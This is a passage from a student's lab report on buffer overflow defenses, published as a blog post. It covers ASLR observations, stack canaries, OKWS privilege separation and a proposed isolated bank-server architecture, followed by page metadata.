reports a wrong username or passcode. A bounds-checked variant such as memcpy_s does the same job, because it requires the programmer to pass the size of the destination as a separate argument and fails instead of overflowing when the number of bytes to copy exceeds it; note, however, that memcpy_s belongs to the optional Annex K of C11 and glibc does not provide it, so on Linux the explicit length check in front of memcpy is the practical fix.<\/p>\n\n\n\n<p>Question 4.2: Please restart the VM without turning off ASLR. Run the server program again<br>five times and write down the ebp addresses of main you observed. Explain how ASLR makes buffer<br>overflow attacks more difficult. 
Discuss possible countermeasures that an attacker can take to defeat ASLR.<\/p>\n\n\n\n<p><span style=\"text-decoration: underline;\">My Answer:<\/span><\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>ebp address: bffff028<\/li>\n\n\n\n<li>ebp address: bff43ad8<\/li>\n\n\n\n<li>ebp address: bfec7228<\/li>\n\n\n\n<li>ebp address: bffff000<\/li>\n\n\n\n<li>ebp address: bf99a058<\/li>\n<\/ol>\n\n\n\n<p>ASLR randomizes the layout of the process's address space, so the attacker cannot predict the memory layout of the program: the base addresses of its memory regions change on every run, as the five different ebp values above show, and a hard-coded address such as the one used in the attack above no longer points where the attacker expects. The attacker can still probe memory by brute force, guessing repeatedly until a guess happens to match the real location, and then modify the attack code to target that address.<\/p>\n\n\n\n<p>Question 4.3: Re-compile the server program with all countermeasures on. You can do it by,<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; title: ; notranslate\" title=\"\">\n$ gcc server.c -o server\n<\/pre><\/div>\n\n\n<p>In the lab report, please write down the size of the gap between auth\u2019s old ebp field and local variables. Explain in more detail how you get this number. Please write down the content placed in this gap and explain how it prevents buffer overflow attacks.<\/p>\n\n\n\n<p><span style=\"text-decoration: underline;\">My Answer:<\/span><\/p>\n\n\n\n<p>The content placed in this gap is a stack canary. It detects modification of the return address on the stack before the address is used by RET: the compiler generates code that writes a \u201ccanary\u201d value onto the stack at function entry, between the local variables and the saved ebp, and checks that the value is unchanged before the function returns. An overflow from the local buffer has to overwrite the canary before it can reach the saved ebp and the return address, so the check fails and the program is terminated instead of returning to the attacker's address.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"7_Task_5_Containing_Successful_Attacks\"><\/span>7 Task 5: Containing Successful Attacks<span class=\"ez-toc-section-end\"><\/span><\/h3>\n\n\n\n<p>Question 5.1: Privilege separation and isolation are two key principles to make a system robust<br>against successful attacks. 
Similar to the Google security architecture, OKWS is a web service system that practices these two principles. Please read the OKWS paper and watch the online video of MIT 6.858 2020 Lecture 5 at tinyurl.com\/sr3jm2bt if necessary. In the lab report, please briefly explain Figure 1 in the OKWS paper and discuss what its security benefits are.<\/p>\n\n\n\n<p><span style=\"text-decoration: underline;\">My Answer:<\/span><\/p>\n\n\n\n<p>The main feature of OKWS is that it splits the web server into multiple processes, each running under a different user ID with different, minimal privileges. It uses UNIX isolation mechanisms to prevent subsystems from reading or modifying each other\u2019s data. In Figure 1 of the OKWS paper, the \u2018okd\u2019 process parses user input and holds no sensitive data. Each \u2018svci\u2019 process parses user input for one service and runs in a chroot()ed \u201cjail\u201d. The jail has no access to the rest of the filesystem: it cannot reach the many UNIX setuid-root programs or any sensitive data elsewhere on disk, so every system file the process needs, e.g. shared libraries, has to be set up inside the jail directory in advance. The OKWS database proxy (data<sub>2<\/sub>) only accepts authenticated requests for a subset of a narrow RPC interface, and it is the only component that can read sensitive data. All of the above features enhance both privilege separation and isolation among the web server processes. Compared with one process per user, OKWS uses one process per service, which balances performance and security. So even if a small component in the system contains a vulnerability, the attacker has to spend a lot of effort to exploit other processes, because every subsystem in the child processes runs with minimal privileges; this ensures that even if a non-privileged process is compromised, there is nothing for the malware\/attacker to do and nowhere else for it to go.<\/p>\n\n\n\n<p>Question 5.2: The bank server program used in this lab is vulnerable because all services (i.e.,<br>login and other request handlers) are implemented in one program. Once one vulnerability is exploited by the attacker, the whole system corrupts. Based on your understanding of the Google security architecture and the OKWS paper, describe a solution to ensure the security of the bank server\/client even if the login service has vulnerabilities that can be exploited by the attacker. Your answer should include sufficient explanations and provide a figure of the architecture of the modified system (i.e., how the system is divided into isolated services, how they connect and interact with each other, etc.).<\/p>\n\n\n\n<p><span style=\"text-decoration: underline;\">My Answer:<\/span><\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img data-opt-id=1353383107  loading=\"lazy\" decoding=\"async\" width=\"864\" height=\"603\" src=\"https:\/\/mlcznkdztmb6.i.optimole.com\/w:auto\/h:auto\/q:mauto\/f:best\/ig:avif\/https:\/\/philip.twinight.co\/portfolio\/wp-content\/uploads\/2024\/03\/image-22.png\" alt=\"\" class=\"wp-image-238\" srcset=\"https:\/\/mlcznkdztmb6.i.optimole.com\/w:864\/h:603\/q:mauto\/f:best\/ig:avif\/https:\/\/philip.twinight.co\/portfolio\/wp-content\/uploads\/2024\/03\/image-22.png 864w, https:\/\/mlcznkdztmb6.i.optimole.com\/w:300\/h:209\/q:mauto\/f:best\/ig:avif\/https:\/\/philip.twinight.co\/portfolio\/wp-content\/uploads\/2024\/03\/image-22.png 300w, 
https:\/\/mlcznkdztmb6.i.optimole.com\/w:768\/h:536\/q:mauto\/f:best\/ig:avif\/https:\/\/philip.twinight.co\/portfolio\/wp-content\/uploads\/2024\/03\/image-22.png 768w\" sizes=\"auto, (max-width: 792px) 100vw, 792px\" \/><\/figure>\n\n\n\n<p>The server isolation design can be divided into two parts: the Encryption Zone and the Isolated Server Zone. All servers, including the database, are placed under a network access group. It is a combined protection that draws partly on OKWS and partly on the Google security architecture.<\/p>\n\n\n\n<p>All data is encrypted in the Encryption Zone. In every secure TLS\/SSL connection, information sent back and forth between the client and the front-end server is encrypted using a secret key that is generated by the client during the TLS handshake. Without this secret key, neither side can decrypt any message encrypted by the other side, which reduces the chance that a packet is eavesdropped on or altered while it is in the Encryption Zone. Apart from that, the firewall differs from a traditional perimeter firewall: it is a network-based firewall, which provides a richer environment for filtering high-volume attacks and unauthorized packets from the outside network. The firewall rules are as tight as possible: only well-documented and required traffic (ingress and egress) from the client computer is allowed, and everything else is denied.<\/p>\n\n\n\n<p>The front-end server and the back-end server work together as a reverse proxy network, somewhat similar to Google\u2019s content delivery network (CDN) but not identical to it. With a reverse proxy, every request from a client\u2019s computer goes to the front-end server first; the front-end server forwards the request to the back-end server, receives the response, and passes the appropriate response back to the client\u2019s computer. Only the back-end server has the right to read and edit the database. This is similar to the OKWS setup: the first layer of the network has just enough privilege to receive requests and communicate with the deeper layer. The front-end server and the clients\u2019 computers can never access the database directly and lack the privileges to do so. For example, an attacker who gains access to the front-end server still cannot read the contents of the database, because the front-end server acts as a communication channel rather than a processing service.<\/p>\n\n\n\n<p>In conclusion, all authorization is determined by membership in a network access group. Access to the database server is restricted to those clients that have a business requirement to access the data, namely the service accounts used by the front-end servers and the administrators of the database. In addition, access is only granted when the request comes from an authorized computer, and every action is recorded and stored in case an investigation is needed. All network traffic to and from the database must be encrypted or it is rejected. Because client computers and the front-end server are not members of the network access group, they cannot access the isolated servers directly.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>This is an individual project of CS3273 &#8211; Data Protection and System Security. I did the project in my year 2 2021\/22 Semester B. Course Instructor: Dr. 
Jun HUANG Project &hellip; <a href=\"https:\/\/philip.twinight.co\/portfolio\/index.php\/2022\/03\/18\/buffer-overflow-attacks-and-defenses\/\" class=\"more-link\"><span>Continue reading<span class=\"screen-reader-text\">Buffer Overflow Attacks and Defenses<\/span><\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":326,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[75,3],"tags":[25,27,28,13,21],"class_list":["post-226","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-cybersecurity","category-proj","tag-2021-22-semester-b","tag-cs3273","tag-data-protection-and-system-security","tag-data-science","tag-year-2"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Buffer Overflow Attacks and Defenses - Philip\u2019s Data Science Diary<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/philip.twinight.co\/portfolio\/index.php\/2022\/03\/18\/buffer-overflow-attacks-and-defenses\/\" \/>\n<meta property=\"og:locale\" content=\"en_GB\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Buffer Overflow Attacks and Defenses - Philip\u2019s Data Science Diary\" \/>\n<meta property=\"og:description\" content=\"This is an individual project of CS3273 &#8211; Data Protection and System Security. I did the project in my year 2 2021\/22 Semester B. Course Instructor: Dr. 
Jun HUANG Project &hellip; Continue readingBuffer Overflow Attacks and Defenses\" \/>\n<meta property=\"og:url\" content=\"https:\/\/philip.twinight.co\/portfolio\/index.php\/2022\/03\/18\/buffer-overflow-attacks-and-defenses\/\" \/>\n<meta property=\"og:site_name\" content=\"Philip\u2019s Data Science Diary\" \/>\n<meta property=\"article:published_time\" content=\"2022-03-18T14:20:00+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2024-03-06T01:52:32+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/mlcznkdztmb6.i.optimole.com\/w:auto\/h:auto\/q:mauto\/f:best\/ig:avif\/https:\/\/philip.twinight.co\/portfolio\/wp-content\/uploads\/2022\/03\/Buffer-Overflow-Attacks-and-Defenses.png\" \/>\n\t<meta property=\"og:image:width\" content=\"1920\" \/>\n\t<meta property=\"og:image:height\" content=\"1080\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"Philip\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Philip\" \/>\n\t<meta name=\"twitter:label2\" content=\"Estimated reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"19 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/philip.twinight.co\\\/portfolio\\\/index.php\\\/2022\\\/03\\\/18\\\/buffer-overflow-attacks-and-defenses\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/philip.twinight.co\\\/portfolio\\\/index.php\\\/2022\\\/03\\\/18\\\/buffer-overflow-attacks-and-defenses\\\/\"},\"author\":{\"name\":\"Philip\",\"@id\":\"https:\\\/\\\/philip.twinight.co\\\/portfolio\\\/#\\\/schema\\\/person\\\/ef4f7cedd9b3bde11e126c4dbe1f8414\"},\"headline\":\"Buffer Overflow Attacks and 
Defenses\",\"datePublished\":\"2022-03-18T14:20:00+00:00\",\"dateModified\":\"2024-03-06T01:52:32+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/philip.twinight.co\\\/portfolio\\\/index.php\\\/2022\\\/03\\\/18\\\/buffer-overflow-attacks-and-defenses\\\/\"},\"wordCount\":3833,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/philip.twinight.co\\\/portfolio\\\/#\\\/schema\\\/person\\\/ef4f7cedd9b3bde11e126c4dbe1f8414\"},\"image\":{\"@id\":\"https:\\\/\\\/philip.twinight.co\\\/portfolio\\\/index.php\\\/2022\\\/03\\\/18\\\/buffer-overflow-attacks-and-defenses\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\/\\/philip.twinight.co\\/portfolio\\/wp-content\\/uploads\\/2022\\/03\\/Buffer-Overflow-Attacks-and-Defenses.png\",\"keywords\":[\"2021\\\/22 Semester B\",\"CS3273\",\"Data Protection and System Security\",\"Data Science\",\"Year 2\"],\"articleSection\":[\"Cybersecurity\",\"Projects\"],\"inLanguage\":\"en-GB\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/philip.twinight.co\\\/portfolio\\\/index.php\\\/2022\\\/03\\\/18\\\/buffer-overflow-attacks-and-defenses\\\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/philip.twinight.co\\\/portfolio\\\/index.php\\\/2022\\\/03\\\/18\\\/buffer-overflow-attacks-and-defenses\\\/\",\"url\":\"https:\\\/\\\/philip.twinight.co\\\/portfolio\\\/index.php\\\/2022\\\/03\\\/18\\\/buffer-overflow-attacks-and-defenses\\\/\",\"name\":\"Buffer Overflow Attacks and Defenses - Philip\u2019s Data Science 
Diary\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/philip.twinight.co\\\/portfolio\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/philip.twinight.co\\\/portfolio\\\/index.php\\\/2022\\\/03\\\/18\\\/buffer-overflow-attacks-and-defenses\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/philip.twinight.co\\\/portfolio\\\/index.php\\\/2022\\\/03\\\/18\\\/buffer-overflow-attacks-and-defenses\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\/\\/philip.twinight.co\\/portfolio\\/wp-content\\/uploads\\/2022\\/03\\/Buffer-Overflow-Attacks-and-Defenses.png\",\"datePublished\":\"2022-03-18T14:20:00+00:00\",\"dateModified\":\"2024-03-06T01:52:32+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/philip.twinight.co\\\/portfolio\\\/index.php\\\/2022\\\/03\\\/18\\\/buffer-overflow-attacks-and-defenses\\\/#breadcrumb\"},\"inLanguage\":\"en-GB\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/philip.twinight.co\\\/portfolio\\\/index.php\\\/2022\\\/03\\\/18\\\/buffer-overflow-attacks-and-defenses\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-GB\",\"@id\":\"https:\\\/\\\/philip.twinight.co\\\/portfolio\\\/index.php\\\/2022\\\/03\\\/18\\\/buffer-overflow-attacks-and-defenses\\\/#primaryimage\",\"url\":\"https:\\/\\/philip.twinight.co\\/portfolio\\/wp-content\\/uploads\\/2022\\/03\\/Buffer-Overflow-Attacks-and-Defenses.png\",\"contentUrl\":\"https:\\/\\/philip.twinight.co\\/portfolio\\/wp-content\\/uploads\\/2022\\/03\\/Buffer-Overflow-Attacks-and-Defenses.png\",\"width\":1920,\"height\":1080},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/philip.twinight.co\\\/portfolio\\\/index.php\\\/2022\\\/03\\\/18\\\/buffer-overflow-attacks-and-defenses\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"\u9996\u9801\",\"item\":\"https:\\\/\\\/philip.twinight.co\\\/portfolio\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Buffer Overflow Attacks and 
Defenses\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/philip.twinight.co\\\/portfolio\\\/#website\",\"url\":\"https:\\\/\\\/philip.twinight.co\\\/portfolio\\\/\",\"name\":\"Philip\u2019s University Data Science Journey\",\"description\":\"Navigating Data Science: From Classroom to Career\",\"publisher\":{\"@id\":\"https:\\\/\\\/philip.twinight.co\\\/portfolio\\\/#\\\/schema\\\/person\\\/ef4f7cedd9b3bde11e126c4dbe1f8414\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/philip.twinight.co\\\/portfolio\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-GB\"},{\"@type\":[\"Person\",\"Organization\"],\"@id\":\"https:\\\/\\\/philip.twinight.co\\\/portfolio\\\/#\\\/schema\\\/person\\\/ef4f7cedd9b3bde11e126c4dbe1f8414\",\"name\":\"Philip\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-GB\",\"@id\":\"https:\\/\\/philip.twinight.co\\/portfolio\\/wp-content\\/uploads\\/2024\\/03\\/favicon.png\",\"url\":\"https:\\/\\/philip.twinight.co\\/portfolio\\/wp-content\\/uploads\\/2024\\/03\\/favicon.png\",\"contentUrl\":\"https:\\/\\/philip.twinight.co\\/portfolio\\/wp-content\\/uploads\\/2024\\/03\\/favicon.png\",\"width\":16,\"height\":16,\"caption\":\"Philip\"},\"logo\":{\"@id\":\"https:\\/\\/philip.twinight.co\\/portfolio\\/wp-content\\/uploads\\/2024\\/03\\/favicon.png\"},\"description\":\"Data Scientist &amp; Systems Engineer. Graduated from City University of Hong Kong. Previously founded Twinight Limited as CTO, developing AI investment analytics and automated trading solutions. 
Currently working as a Test and Integration Engineer on a Vessel Traffic Service (VTS) system in the maritime industry since December 2024.\",\"sameAs\":[\"https:\\\/\\\/philip.twinight.co\\\/portfolio\"],\"url\":\"https:\\\/\\\/philip.twinight.co\\\/portfolio\\\/index.php\\\/author\\\/philip\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","_links":{"self":[{"href":"https:\/\/philip.twinight.co\/portfolio\/index.php\/wp-json\/wp\/v2\/posts\/226","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/philip.twinight.co\/portfolio\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/philip.twinight.co\/portfolio\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/philip.twinight.co\/portfolio\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/philip.twinight.co\/portfolio\/index.php\/wp-json\/wp\/v2\/comments?post=226"}],"version-history":[{"count":7,"href":"https:\/\/philip.twinight.co\/portfolio\/index.php\/wp-json\/wp\/v2\/posts\/226\/revisions"}],"predecessor-version":[{"id":341,"href":"https:\/\/philip.twinight.co\/portfolio\/index.php\/wp-json\/wp\/v2\/posts\/226\/revisions\/341"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/philip.twinight.co\/portfolio\/index.php\/wp-json\/wp\/v2\/media\/326"}],"wp:attachment":[{"href":"https:\/\/philip.twinight.co\/portfolio\/index.php\/wp-json\/wp\/v2\/media?parent=226"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/philip.twinight.co\/portfolio\/index.php\/wp-json\/wp\/v2\/categories?post=226"},{"taxonomy":"post_tag","embeddable":true,"href":"
https:\/\/philip.twinight.co\/portfolio\/index.php\/wp-json\/wp\/v2\/tags?post=226"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}